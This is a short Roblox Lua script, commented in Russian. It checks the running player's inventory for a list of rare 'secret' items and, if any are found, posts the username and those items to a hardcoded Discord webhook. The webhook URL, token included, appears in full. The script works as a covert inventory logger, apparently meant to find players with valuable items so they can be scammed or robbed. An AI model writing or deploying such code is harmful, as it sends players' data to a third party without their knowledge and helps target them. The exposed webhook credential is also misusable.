local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local HttpService = game:GetService("HttpService")

local localPlayer = Players.LocalPlayer

-- === Список разрешённых секреток ===
local allowItems = {
    "Garamararam",
    "UltraBrain",
    "LegendaryTool",
}

-- === Сбор инвентаря с фильтром секреток ===
local function collectInventory()
    local items = {}

    local function addItemsFrom(container)
        if not container then return end
        for _, item in ipairs(container:GetChildren()) do
            if item:IsA("Tool") then
                for _, allowed in ipairs(allowItems) do
                    if item.Name == allowed then
                        table.insert(items, item.Name)
                        break
                    end
                end
            end
        end
    end

    addItemsFrom(localPlayer:FindFirstChild("Backpack"))
    addItemsFrom(localPlayer.Character)

    if #items == 0 then
        return nil -- нет секреток
    else
        local invText = "\n--- Inventory ---\n"
        for _, name in ipairs(items) do
            invText = invText .. "- " .. name .. "\n"
        end
        return invText
    end
end

-- === Основной запуск ===
local inventory = collectInventory()
if inventory then
    local brainrots = "❌ Brainrots проверка отключена" -- или можно добавить свою функцию
    local content = brainrots .. inventory

    local url = "https://discord.com/api/webhooks/1417846130619977738/mgmCuOeNpaNOBQddZUtCPaeheSjaBWdLNLfPPg2xk6-533OjiGgbjxwmkKPsQO7TK9ep" -- сюда свой вебхук
    local body = HttpService:JSONEncode({
        ["embeds"] = {{
            ["title"] = "**Brainrots | Elly**",
            ["color"] = 65280,
            ["fields"] = {
                {["name"] = "👤 Username", ["value"] = localPlayer.Name, ["inline"] = false},
                {["name"] = "🪐 Brainrots \ Plot", ["value"] = content, ["inline"] = false}
            }
        }}
    })
    HttpService:PostAsync(url, body, Enum.HttpContentType.ApplicationJson)
end
